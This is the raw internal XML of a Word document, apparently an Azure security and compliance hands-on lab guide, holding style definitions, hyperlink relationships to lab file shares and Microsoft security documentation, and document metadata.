    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DA573F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="003B6B" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille4-Accentuation4">
    <w:name w:val="Grid Table 4 Accent 4"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00416A9B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="FF39E6" w:themeColor="accent4" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="B4009E" w:themeColor="accent4"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="B4009E" w:themeColor="accent4"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B4009E" w:themeColor="accent4"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="B4009E" w:themeColor="accent4"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="B4009E" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="B4009E" w:themeColor="accent4"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFBDF6" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFBDF6" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD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27888618">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4693162">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10620236">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455602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file://contoso.lab/hr/restricted" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://contoso.lab/hr/restricted" TargetMode="External"/><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s.microsoft.com/en-us/microsoft-desktop-optimization-pack/mbam-v25/" TargetMode="External"/><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yperlink" Target="file:///\\victim-srv.contoso.lab\CONFIDENTIAL"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eader" Target="header6.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windows/security/identity-protection/credential-guard/credential-guard"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file://contoso.lab/hr/restricted" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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hyperlink" Target="file:///\\VICTIM-SRV\c$\CONTOSO-CA.cer" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\victim-srv.contoso.lab\CONFIDENTIA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contoso.lab/hr/restricted" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manag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microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-group-policy-settings" TargetMode="External"/><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demo.wd.microsoft.com/Page/CFA2" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId8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17b36ea-b140-47be-8d07-387acfc908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6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="50ecefdbe3001ee575079d0774258d48">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="517b36ea-b140-47be-8d07-387acfc90838" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b35c8b3b8f6e6c218ba46f5476dc14e2" ns1:_="" ns2:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="517b36ea-b140-47be-8d07-387acfc90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 ds:uri="517b36ea-b140-47be-8d07-387acfc90838"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5987994F-7647-4A08-88DB-52F9BA5C9A27}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>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BD50EAF1-5BB5-4D72-A655-F09D2D68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41</Words>
  <Characters>32131</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s-on lab step-by step - Azure security privacy and compliance</vt:lpstr>
      <vt:lpstr>Hands-on lab step-by step - Azure security privacy and compliance</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-25T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-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